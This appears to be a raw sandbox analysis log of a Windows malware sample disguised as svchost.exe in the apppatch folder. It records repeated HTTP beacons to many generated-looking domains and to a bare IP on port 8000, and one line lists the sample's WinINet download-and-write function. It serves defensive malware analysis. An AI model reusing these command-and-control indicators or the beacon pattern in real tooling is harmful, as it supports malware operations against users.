Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731345856.5179536
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731345856.5241611
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0424-3743-a98f-0148015a85a2 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345856.5179536
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0424-3729-8680-cf4058033ce0 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345856.5241611; parking_session=a5572c25-6032-467b-b015-10575c4e4ea5
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=904vr478891445443024397
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.comCookie: btst=0786bcdb46d67d94d9de9fd3d4d02561|66.23.206.109|1731345850|1731345850|0|1|0; snkz=66.23.206.109
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comCookie: btst=44c79a21644891f33b42e7860178412d|66.23.206.109|1731345850|1731345850|0|1|0; snkz=66.23.206.109
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.comIf-Modified-Since: Wed, 22 Feb 2023 21:25:52 GMTIf-None-Match: "63f68860-251"
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.comCookie: btst=5e81f1ad7c4a96c1877df991163ec825|66.23.206.109|1731345856|1731345856|0|1|0; snkz=66.23.206.109
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0426-044d-b465-1d078f2f97da HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345856.5179536
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0426-0467-9c46-ef7d79ef9150 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345856.5241611
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C839C0 memset,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,memset,InternetReadFile,WriteFile,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,RtlFreeHeap,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_02C839C0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0424-16c6-a16f-217434b104d2 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345856.5179536
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0424-16dd-8cfc-e770b1d90a79 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345856.5241611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=244ca17e-8cf9-4dfe-af64-36b71a041679
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731345856.5179536
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731345856.5241611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0424-3743-a98f-0148015a85a2 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345856.5179536
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0424-3729-8680-cf4058033ce0 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345856.5241611; parking_session=a5572c25-6032-467b-b015-10575c4e4ea5
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=904vr478891445443024397
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
